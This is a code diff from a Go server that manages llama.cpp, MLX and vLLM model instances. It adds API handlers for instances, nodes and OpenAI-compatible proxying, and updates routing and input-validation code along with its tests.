 // LlamaServerVersionHandler godoc
 // @Summary Get version of llama server
 // @Description Returns the version of the llama server command
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/backends/llama-cpp/version [get]
 func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
 	return h.executeLlamaServerCommand("--version", "Failed to get version")
 }
 // LlamaServerListDevicesHandler godoc
 // @Summary List available devices for llama server
 // @Description Returns a list of available devices for the llama server
 // @Tags Backends
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "List of devices"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/backends/llama-cpp/devices [get]
 func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
 	return h.executeLlamaServerCommand("--list-devices", "Failed to list devices")
 }
--- a/pkg/server/handlers_instances.go
+++ b/pkg/server/handlers_instances.go
@@ -0,0 +1,353 @@
 package server
 import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"llamactl/pkg/validation"
 	"net/http"
 	"strconv"
 	"strings"
 	"github.com/go-chi/chi/v5"
 )
 // ListInstances godoc
 // @Summary List all instances
 // @Description Returns a list of all instances managed by the server
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {array} instance.Instance "List of instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances [get]
 func (h *Handler) ListInstances() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instances, err := h.InstanceManager.ListInstances()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "list_failed", "Failed to list instances: "+err.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, instances)
 	}
 }
 // CreateInstance godoc
 // @Summary Create and start a new instance
 // @Description Creates a new instance with the provided configuration options
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Param options body instance.Options true "Instance configuration options"
 // @Success 201 {object} instance.Instance "Created instance details"
 // @Failure 400 {string} string "Invalid request body"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name} [post]
 func (h *Handler) CreateInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		validatedName, err := validation.ValidateInstanceName(name)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		var options instance.Options
 		if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
 			return
 		}
 		inst, err := h.InstanceManager.CreateInstance(validatedName, &options)
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "create_failed", "Failed to create instance: "+err.Error())
 			return
 		}
 		writeJSON(w, http.StatusCreated, inst)
 	}
 }
 // GetInstance godoc
 // @Summary Get details of a specific instance
 // @Description Returns the details of a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Instance "Instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name} [get]
 func (h *Handler) GetInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		validatedName, err := validation.ValidateInstanceName(name)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		inst, err := h.InstanceManager.GetInstance(validatedName)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, inst)
 	}
 }
 // UpdateInstance godoc
 // @Summary Update an instance's configuration
 // @Description Updates the configuration of a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Param options body instance.Options true "Instance configuration options"
 // @Success 200 {object} instance.Instance "Updated instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name} [put]
 func (h *Handler) UpdateInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		validatedName, err := validation.ValidateInstanceName(name)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		var options instance.Options
 		if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
 			return
 		}
 		inst, err := h.InstanceManager.UpdateInstance(validatedName, &options)
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "update_failed", "Failed to update instance: "+err.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, inst)
 	}
 }
 // StartInstance godoc
 // @Summary Start a stopped instance
 // @Description Starts a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Instance "Started instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name}/start [post]
 func (h *Handler) StartInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		validatedName, err := validation.ValidateInstanceName(name)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		inst, err := h.InstanceManager.StartInstance(validatedName)
 		if err != nil {
 			// Check if error is due to maximum running instances limit
 			if _, ok := err.(manager.MaxRunningInstancesError); ok {
 				writeError(w, http.StatusConflict, "max_instances_reached", err.Error())
 				return
 			}
 			writeError(w, http.StatusInternalServerError, "start_failed", "Failed to start instance: "+err.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, inst)
 	}
 }
 // StopInstance godoc
 // @Summary Stop a running instance
 // @Description Stops a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Instance "Stopped instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name}/stop [post]
 func (h *Handler) StopInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		validatedName, err := validation.ValidateInstanceName(name)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		inst, err := h.InstanceManager.StopInstance(validatedName)
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "stop_failed", "Failed to stop instance: "+err.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, inst)
 	}
 }
 // RestartInstance godoc
 // @Summary Restart a running instance
 // @Description Restarts a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Success 200 {object} instance.Instance "Restarted instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name}/restart [post]
 func (h *Handler) RestartInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		validatedName, err := validation.ValidateInstanceName(name)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		inst, err := h.InstanceManager.RestartInstance(validatedName)
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "restart_failed", "Failed to restart instance: "+err.Error())
 			return
 		}
 		writeJSON(w, http.StatusOK, inst)
 	}
 }
 // DeleteInstance godoc
 // @Summary Delete an instance
 // @Description Stops and removes a specific instance by name
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 204 "No Content"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name} [delete]
 func (h *Handler) DeleteInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		validatedName, err := validation.ValidateInstanceName(name)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		if err := h.InstanceManager.DeleteInstance(validatedName); err != nil {
 			writeError(w, http.StatusInternalServerError, "delete_failed", "Failed to delete instance: "+err.Error())
 			return
 		}
 		w.WriteHeader(http.StatusNoContent)
 	}
 }
 // GetInstanceLogs godoc
 // @Summary Get logs from a specific instance
 // @Description Returns the logs from a specific instance by name with optional line limit
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Param lines query string false "Number of lines to retrieve (default: all lines)"
 // @Produces text/plain
 // @Success 200 {string} string "Instance logs"
 // @Failure 400 {string} string "Invalid name format or lines parameter"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/instances/{name}/logs [get]
 func (h *Handler) GetInstanceLogs() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		validatedName, err := validation.ValidateInstanceName(name)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		lines := r.URL.Query().Get("lines")
 		numLines := -1 // Default to all lines
 		if lines != "" {
 			parsedLines, err := strconv.Atoi(lines)
 			if err != nil {
 				writeError(w, http.StatusBadRequest, "invalid_parameter", "Invalid lines parameter: "+err.Error())
 				return
 			}
 			numLines = parsedLines
 		}
 		// Use the instance manager which handles both local and remote instances
 		logs, err := h.InstanceManager.GetInstanceLogs(validatedName, numLines)
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "logs_failed", "Failed to get logs: "+err.Error())
 			return
 		}
 		writeText(w, http.StatusOK, logs)
 	}
 }
 // InstanceProxy godoc
 // @Summary Proxy requests to a specific instance, does not autostart instance if stopped
 // @Description Forwards HTTP requests to the llama-server instance running on a specific port
 // @Tags Instances
 // @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 200 "Request successfully proxied to instance"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Failure 503 {string} string "Instance is not running"
 // @Router /api/v1/instances/{name}/proxy [get]
 // @Router /api/v1/instances/{name}/proxy [post]
 func (h *Handler) InstanceProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		inst, err := h.getInstance(r)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
 			return
 		}
 		if !inst.IsRunning() {
 			writeError(w, http.StatusServiceUnavailable, "instance_not_running", "Instance is not running")
 			return
 		}
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "proxy_failed", "Failed to get proxy: "+err.Error())
 			return
 		}
 		if !inst.IsRemote() {
 			// Strip the "/api/v1/instances/<name>/proxy" prefix from the request URL
 			prefix := fmt.Sprintf("/api/v1/instances/%s/proxy", inst.Name)
 			r.URL.Path = strings.TrimPrefix(r.URL.Path, prefix)
 		}
 		// Set forwarded headers
 		r.Header.Set("X-Forwarded-Host", r.Header.Get("Host"))
 		r.Header.Set("X-Forwarded-Proto", "http")
 		proxy.ServeHTTP(w, r)
 	}
 }
--- a/pkg/server/handlers_nodes.go
+++ b/pkg/server/handlers_nodes.go
@@ -0,0 +1,70 @@
 package server
 import (
 	"net/http"
 	"github.com/go-chi/chi/v5"
 )
 // NodeResponse represents a node configuration in API responses
 type NodeResponse struct {
 	Address string `json:"address"`
 }
 // ListNodes godoc
 // @Summary List all configured nodes
 // @Description Returns a map of all nodes configured in the server (node name -> node config)
 // @Tags Nodes
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {object} map[string]NodeResponse "Map of nodes"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/nodes [get]
 func (h *Handler) ListNodes() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Convert to sanitized response format (map of name -> NodeResponse)
 		nodeResponses := make(map[string]NodeResponse, len(h.cfg.Nodes))
 		for name, node := range h.cfg.Nodes {
 			nodeResponses[name] = NodeResponse{
 				Address: node.Address,
 			}
 		}
 		writeJSON(w, http.StatusOK, nodeResponses)
 	}
 }
 // GetNode godoc
 // @Summary Get details of a specific node
 // @Description Returns the details of a specific node by name
 // @Tags Nodes
 // @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Node Name"
 // @Success 200 {object} NodeResponse "Node details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 404 {string} string "Node not found"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/nodes/{name} [get]
 func (h *Handler) GetNode() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Node name cannot be empty")
 			return
 		}
 		nodeConfig, exists := h.cfg.Nodes[name]
 		if !exists {
 			writeError(w, http.StatusNotFound, "not_found", "Node not found")
 			return
 		}
 		// Convert to sanitized response format
 		nodeResponse := NodeResponse{
 			Address: nodeConfig.Address,
 		}
 		writeJSON(w, http.StatusOK, nodeResponse)
 	}
 }
--- a/pkg/server/handlers_openai.go
+++ b/pkg/server/handlers_openai.go
@@ -0,0 +1,129 @@
 package server
 import (
 	"bytes"
 	"encoding/json"
 	"io"
 	"llamactl/pkg/validation"
 	"net/http"
 )
 // OpenAIListInstancesResponse represents the response structure for listing instances (models) in OpenAI-compatible format
 type OpenAIListInstancesResponse struct {
 	Object string           `json:"object"`
 	Data   []OpenAIInstance `json:"data"`
 }
 // OpenAIInstance represents a single instance (model) in OpenAI-compatible format
 type OpenAIInstance struct {
 	ID      string `json:"id"`
 	Object  string `json:"object"`
 	Created int64  `json:"created"`
 	OwnedBy string `json:"owned_by"`
 }
 // OpenAIListInstances godoc
 // @Summary List instances in OpenAI-compatible format
 // @Description Returns a list of instances in a format compatible with OpenAI API
 // @Tags OpenAI
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /v1/models [get]
 func (h *Handler) OpenAIListInstances() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		instances, err := h.InstanceManager.ListInstances()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "list_failed", "Failed to list instances: "+err.Error())
 			return
 		}
 		openaiInstances := make([]OpenAIInstance, len(instances))
 		for i, inst := range instances {
 			openaiInstances[i] = OpenAIInstance{
 				ID:      inst.Name,
 				Object:  "model",
 				Created: inst.Created,
 				OwnedBy: "llamactl",
 			}
 		}
 		openaiResponse := OpenAIListInstancesResponse{
 			Object: "list",
 			Data:   openaiInstances,
 		}
 		writeJSON(w, http.StatusOK, openaiResponse)
 	}
 }
 // OpenAIProxy godoc
 // @Summary OpenAI-compatible proxy endpoint
 // @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
 // @Tags OpenAI
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Success 200 "OpenAI response"
 // @Failure 400 {string} string "Invalid request body or instance name"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /v1/ [post]
 func (h *Handler) OpenAIProxy() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Read the entire body first
 		bodyBytes, err := io.ReadAll(r.Body)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Failed to read request body")
 			return
 		}
 		r.Body.Close()
 		// Parse the body to extract instance name
 		var requestBody map[string]any
 		if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
 			return
 		}
 		modelName, ok := requestBody["model"].(string)
 		if !ok || modelName == "" {
 			writeError(w, http.StatusBadRequest, "invalid_request", "Instance name is required")
 			return
 		}
 		// Validate instance name at the entry point
 		validatedName, err := validation.ValidateInstanceName(modelName)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
 			return
 		}
 		// Route to the appropriate inst based on instance name
 		inst, err := h.InstanceManager.GetInstance(validatedName)
 		if err != nil {
 			writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
 			return
 		}
 		if !inst.IsRemote() && !inst.IsRunning() {
 			err := h.ensureInstanceRunning(inst)
 			if err != nil {
 				writeError(w, http.StatusInternalServerError, "instance_start_failed", err.Error())
 				return
 			}
 		}
 		proxy, err := inst.GetProxy()
 		if err != nil {
 			writeError(w, http.StatusInternalServerError, "proxy_failed", err.Error())
 			return
 		}
 		// Recreate the request body from the bytes we read
 		r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
 		r.ContentLength = int64(len(bodyBytes))
 		proxy.ServeHTTP(w, r)
 	}
 }
--- a/pkg/server/handlers_system.go
+++ b/pkg/server/handlers_system.go
@@ -0,0 +1,22 @@
 package server
 import (
 	"fmt"
 	"net/http"
 )
 // VersionHandler godoc
 // @Summary Get llamactl version
 // @Description Returns the version of the llamactl command
 // @Tags System
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /api/v1/version [get]
 func (h *Handler) VersionHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		versionInfo := fmt.Sprintf("Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
 		writeText(w, http.StatusOK, versionInfo)
 	}
 }
--- a/pkg/server/openai.go
+++ b/pkg/server/openai.go
@@ -1,13 +0,0 @@
 package server
 type OpenAIListInstancesResponse struct {
 	Object string           `json:"object"`
 	Data   []OpenAIInstance `json:"data"`
 }
 type OpenAIInstance struct {
 	ID      string `json:"id"`
 	Object  string `json:"object"`
 	Created int64  `json:"created"`
 	OwnedBy string `json:"owned_by"`
 }
--- a/pkg/server/routes.go
+++ b/pkg/server/routes.go
@@ -8,7 +8,7 @@ import (
 	"github.com/go-chi/cors"
 	httpSwagger "github.com/swaggo/http-swagger"
-	_ "llamactl/apidocs"
+	_ "llamactl/docs"
 	"llamactl/webui"
 )
@@ -20,7 +20,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
 	r.Use(cors.Handler(cors.Options{
 		AllowedOrigins:   handler.cfg.Server.AllowedOrigins,
 		AllowedMethods:   []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
-		AllowedHeaders:   []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
+		AllowedHeaders:   handler.cfg.Server.AllowedHeaders,
 		ExposedHeaders:   []string{"Link"},
 		AllowCredentials: false,
 		MaxAge:           300,
@@ -60,6 +60,15 @@ func SetupRouter(handler *Handler) *chi.Mux {
 			})
 		})
 		// Node management endpoints
 		r.Route("/nodes", func(r chi.Router) {
 			r.Get("/", handler.ListNodes()) // List all nodes
 			r.Route("/{name}", func(r chi.Router) {
 				r.Get("/", handler.GetNode())
 			})
 		})
 		// Instance management endpoints
 		r.Route("/instances", func(r chi.Router) {
 			r.Get("/", handler.ListInstances()) // List all instances
@@ -77,7 +86,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
 				// Llama.cpp server proxy endpoints (proxied to the actual llama.cpp server)
 				r.Route("/proxy", func(r chi.Router) {
-					r.HandleFunc("/*", handler.ProxyToInstance()) // Proxy all llama.cpp server requests
+					r.HandleFunc("/*", handler.InstanceProxy()) // Proxy all llama.cpp server requests
 				})
 			})
 		})
@@ -103,6 +112,51 @@ func SetupRouter(handler *Handler) *chi.Mux {
 	})
 	r.Route("/llama-cpp/{name}", func(r chi.Router) {
 		// Public Routes
 		// Allow llama-cpp server to serve its own WebUI if it is running.
 		// Don't auto start the server since it can be accessed without an API key
 		r.Get("/", handler.LlamaCppUIProxy())
 		// Private Routes
 		r.Group(func(r chi.Router) {
 			if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
 				r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
 			}
 			// This handler auto start the server if it's not running
 			llamaCppHandler := handler.LlamaCppProxy()
 			// llama.cpp server specific proxy endpoints
 			r.Get("/props", llamaCppHandler)
 			// /slots endpoint is secured (see: https://github.com/ggml-org/llama.cpp/pull/15630)
 			r.Get("/slots", llamaCppHandler)
 			r.Post("/apply-template", llamaCppHandler)
 			r.Post("/completion", llamaCppHandler)
 			r.Post("/detokenize", llamaCppHandler)
 			r.Post("/embeddings", llamaCppHandler)
 			r.Post("/infill", llamaCppHandler)
 			r.Post("/metrics", llamaCppHandler)
 			r.Post("/props", llamaCppHandler)
 			r.Post("/reranking", llamaCppHandler)
 			r.Post("/tokenize", llamaCppHandler)
 			// OpenAI-compatible proxy endpoint
 			// Handles all POST requests to /v1/*, including:
 			//   - /v1/completions
 			//   - /v1/chat/completions
 			//   - /v1/embeddings
 			//   - /v1/rerank
 			//   - /v1/reranking
 			// llamaCppHandler is used here because some users of llama.cpp endpoints depend
 			// on "model" field being optional, and handler.OpenAIProxy requires it.
 			r.Post("/v1/*", llamaCppHandler)
 		})
 	})
 	// Serve WebUI files
 	if err := webui.SetupWebUI(r); err != nil {
 		fmt.Printf("Failed to set up WebUI: %v\n", err)
--- a/pkg/testutil/helpers.go
+++ b/pkg/testutil/helpers.go
@@ -1,5 +1,7 @@
 package testutil
 import "slices"
 // Helper functions for pointer fields
 func BoolPtr(b bool) *bool {
 	return &b
@@ -8,3 +10,23 @@ func BoolPtr(b bool) *bool {
 func IntPtr(i int) *int {
 	return &i
 }
 // Helper functions for testing command arguments
 // Contains checks if a slice contains a specific item
 func Contains(slice []string, item string) bool {
 	return slices.Contains(slice, item)
 }
 // ContainsFlagWithValue checks if args contains a flag followed by a specific value
 func ContainsFlagWithValue(args []string, flag, value string) bool {
 	for i, arg := range args {
 		if arg == flag {
 			// Check if there's a next argument and it matches the expected value
 			if i+1 < len(args) && args[i+1] == value {
 				return true
 			}
 		}
 	}
 	return false
 }
--- a/pkg/validation/validation.go
+++ b/pkg/validation/validation.go
@@ -2,8 +2,6 @@ package validation
 import (
 	"fmt"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
 	"reflect"
 	"regexp"
 )
@@ -24,8 +22,8 @@ var (
 type ValidationError error
-// validateStringForInjection checks if a string contains dangerous patterns
+// ValidateStringForInjection checks if a string contains dangerous patterns
-func validateStringForInjection(value string) error {
+func ValidateStringForInjection(value string) error {
 	for _, pattern := range dangerousPatterns {
 		if pattern.MatchString(value) {
 			return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
@@ -34,83 +32,8 @@ func validateStringForInjection(value string) error {
 	return nil
 }
-// ValidateInstanceOptions performs validation based on backend type
+// ValidateStructStrings recursively validates all string fields in a struct
-func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
+func ValidateStructStrings(v any, fieldPath string) error {
 	if options == nil {
 		return ValidationError(fmt.Errorf("options cannot be nil"))
 	}
 	// Validate based on backend type
 	switch options.BackendType {
 	case backends.BackendTypeLlamaCpp:
 		return validateLlamaCppOptions(options)
 	case backends.BackendTypeMlxLm:
 		return validateMlxOptions(options)
 	case backends.BackendTypeVllm:
 		return validateVllmOptions(options)
 	default:
 		return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
 	}
 }
 // validateLlamaCppOptions validates llama.cpp specific options
 func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
 	if options.LlamaServerOptions == nil {
 		return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
 	}
 	// Use reflection to check all string fields for injection patterns
 	if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
 		return err
 	}
 	// Basic network validation for port
 	if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
 		return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
 	}
 	return nil
 }
 // validateMlxOptions validates MLX backend specific options
 func validateMlxOptions(options *instance.CreateInstanceOptions) error {
 	if options.MlxServerOptions == nil {
 		return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
 	}
 	if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
 		return err
 	}
 	// Basic network validation for port
 	if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
 		return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
 	}
 	return nil
 }
 // validateVllmOptions validates vLLM backend specific options
 func validateVllmOptions(options *instance.CreateInstanceOptions) error {
 	if options.VllmServerOptions == nil {
 		return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
 	}
 	// Use reflection to check all string fields for injection patterns
 	if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
 		return err
 	}
 	// Basic network validation for port
 	if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
 		return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
 	}
 	return nil
 }
 // validateStructStrings recursively validates all string fields in a struct
 func validateStructStrings(v any, fieldPath string) error {
 	val := reflect.ValueOf(v)
 	if val.Kind() == reflect.Ptr {
 		val = val.Elem()
@@ -136,21 +59,21 @@ func validateStructStrings(v any, fieldPath string) error {
 		switch field.Kind() {
 		case reflect.String:
-			if err := validateStringForInjection(field.String()); err != nil {
+			if err := ValidateStringForInjection(field.String()); err != nil {
 				return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
 			}
 		case reflect.Slice:
 			if field.Type().Elem().Kind() == reflect.String {
 				for j := 0; j < field.Len(); j++ {
-					if err := validateStringForInjection(field.Index(j).String()); err != nil {
+					if err := ValidateStringForInjection(field.Index(j).String()); err != nil {
 						return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
 					}
 				}
 			}
 		case reflect.Struct:
-			if err := validateStructStrings(field.Interface(), fieldName); err != nil {
+			if err := ValidateStructStrings(field.Interface(), fieldName); err != nil {
 				return err
 			}
 		}
--- a/pkg/validation/validation_test.go
+++ b/pkg/validation/validation_test.go
@@ -2,9 +2,6 @@ package validation_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
 	"llamactl/pkg/validation"
 	"strings"
 	"testing"
@@ -58,13 +55,11 @@ func TestValidateInstanceName(t *testing.T) {
 }
 func TestValidateInstanceOptions_NilOptions(t *testing.T) {
-	err := validation.ValidateInstanceOptions(nil)
+	var opts backends.Options
 	err := opts.ValidateInstanceOptions()
 	if err == nil {
 		t.Error("Expected error for nil options")
 	}
 	if !strings.Contains(err.Error(), "options cannot be nil") {
 		t.Errorf("Expected 'options cannot be nil' error, got: %v", err)
 	}
 }
 func TestValidateInstanceOptions_PortValidation(t *testing.T) {
@@ -83,14 +78,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			options := &instance.CreateInstanceOptions{
+			options := backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Port: tt.port,
 				},
 			}
-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
 			}
@@ -137,14 +132,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Model field (string field)
-			options := &instance.CreateInstanceOptions{
+			options := backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model: tt.value,
 				},
 			}
-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
 			}
@@ -175,14 +170,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Lora field (array field)
-			options := &instance.CreateInstanceOptions{
+			options := backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Lora: tt.array,
 				},
 			}
-			err := validation.ValidateInstanceOptions(options)
+			err := options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
 			}
@@ -194,14 +189,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 	// Test that injection in any field is caught
 	tests := []struct {
 		name    string
-		options *instance.CreateInstanceOptions
+		options backends.Options
 		wantErr bool
 	}{
 		{
 			name: "injection in model field",
-			options: &instance.CreateInstanceOptions{
+			options: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:  "safe.gguf",
